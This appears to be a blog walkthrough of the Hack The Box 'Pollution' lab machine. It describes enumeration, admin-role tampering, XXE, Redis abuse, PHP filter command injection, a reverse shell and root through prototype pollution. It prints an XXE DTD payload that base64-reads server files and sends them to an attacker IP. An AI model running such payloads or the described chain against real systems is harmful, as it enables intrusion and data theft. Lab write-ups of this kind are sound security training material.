In this post, I would like to share a walkthrough of the Pollution Machine from Hack the Box


This room will be considered a Hard machine on Hack the Box

What will you gain from the Pollution machine?


For the user flag, you will need to enumerate the website via burpsuite and find an attachment that contains a token to which we can take advantage of admin privileges to access the website. We can execute the XML external entity (XXE) injection. We also can obtain the access to redis server which we can modify to get access to the developer’s site. Once we access the developer’s site, we can execute the PHP filter Injection to obtain the reverse shell connection.


As for the root flag, you need to exploit a prototype pollution vulnerability which we should get execution and a shell on the root shell

Information Gathering on Pollution Machine


Once we have started the VPN connection which requires a download from Hackthebox, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN


Let’s access the website interface


On the website interface, there’s not much of thing that we can login and register function


Therefore, let’s register our new account as shown in the screenshot above.


Let’s try to login with the credentials that we created earlier.


As a result, we have successfully accessed the home page which means we managed to register and login to the page.


From the gobuster output, we have managed to sight a subdomain for the machine such as forum.collect.htb and developers.collect.htb


The screenshot above shows the website interface for the forum interface


Sadly, we don’t have any credentials that we can use to login over here.

Enumerate the subdomain “forum.collect.htb”


When we analyze the forum page, I notice that there are a few users available within the member list


Let’s register the username on the forum website


Finally, we have successfully registered and login on to the forum’s dashboard


There is one message left on the forum that sounds like “I am unable to login to the Pollution API” by Victor


As shown in the screenshot above, Victor did leave an attachment of the proxy_history


Inside the proxy_history file, I found a base64 encoded which could be useful for us


We have obtained the packet which leads to setting the admin role


The screenshot above shows the original packet for the collect.htb


We should set our account role as admin via Burpsuite


At last, we managed to access the admin page on the collect.htb


The screenshot above shows the interface on the browser version.

XXE attack on the machine


The website interface has an xxe vulnerability that we can take advantage of.


The user already exists


Let’s start our Python server on our machine itself.

<!ENTITY % file SYSTEM 'php://filter/convert.base64-encode/resource=../index.php'>
<!ENTITY % eval "<!ENTITY % exfiltrate SYSTEM 'http://<IP ADDRESS>/?file=%file;'>">
%eval;
%exfiltrate;

The dtd code can be written as shown above


We should execute the XXE attack which uses the payload as shown below

manage_api=<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://<IP ADDRESS>/dark.dtd"> %xxe;]><root>
<method>POST</method><uri>/auth/register</uri><user><username>mrk1</username><password>mrk</password></user></root>

By default, we can use and change the payload so that we can retrieve any file from our attacker’s machine.


We managed to obtain a hash from the attack


The hash has been identified as apache md5


At last, we managed to obtain a password from the hashes

Redis-Cli command


Therefore, let’s connect the redis-cli command as shown in the screenshot above


We should be giving permission from the admin to our own user “darknite”


At last, we managed to access the dashboard using those credentials.


We are required to create a file that contains a reverse shell


As a result, let’s start our Python server


We should generate the PHP filter for PHPinfo which we can test for the visible purpose


Boom! We have managed to be sighted on the PHPinfo which we know the PHP filter works


Let’s try the command injection for this purpose


As we expected, it works which it provides the output of “www-data”


Therefore, let’s replace the command with trying to curl our malicious file and execute it as bash


Therefore, we managed to upload the malicious file to the machine


As a result, we have successfully accessed the machine via the reverse shell


We have a bunch of PHP files that we could investigate into

Enumerate the MySQL database


From one of the PHP files, we found a password for the MySQL database.


At last, we should be accessing the MySQL database via the credentials that we found earlier.


However, there’s nothing that we can use from the MySQL database.


When looking at the port that has been open on the machine, i notice that there’s one port which not commonly used.


We should transfer the fpm.py that we download from here


By default, we should be able to execute the command above but sadly it shows the error “File not found”


As a result, we should create the file “darknite.php”


Boom! We have the command injection to work on the machine


Therefore, let’s add our own SSH public key to the machine


Finally, we managed to access the machine via SSH service


We can read the user flag by typing the “cat user.txt” command

Another method to get a foothold on pollution machine


Sadly, it doesn’t work anymore when i try to test the Python script before this writeup is release


We managed to see there is a user called Victor that runs bash


We should be creating a bash file that contains something as shown above which the script can be found here


As a result, we should be able to run the file in order to retrieve a reverse connection


Finally, we managed to obtain the reverse shell connection back to us.

Escalate to Root Privileges Access


After roaming the. machine, i notice that there’s a file in which i found a pollution_api directory that we can investigate later.


We can access back the MySQL database, but we will be using the pollution_api these times.


There are two tables which we can investigate the user’s tables


However, there’s nothing useful from the user’s tables but we can change the roles instead


The command above will update the database from a normal user to an admin role


We can trigger the database by running the “curl” command


Boom! The /bin/bash has been change to SUID binary which we can change to a root shell


We can read the root flag by typing the “cat /root/root.txt” command

Extra Information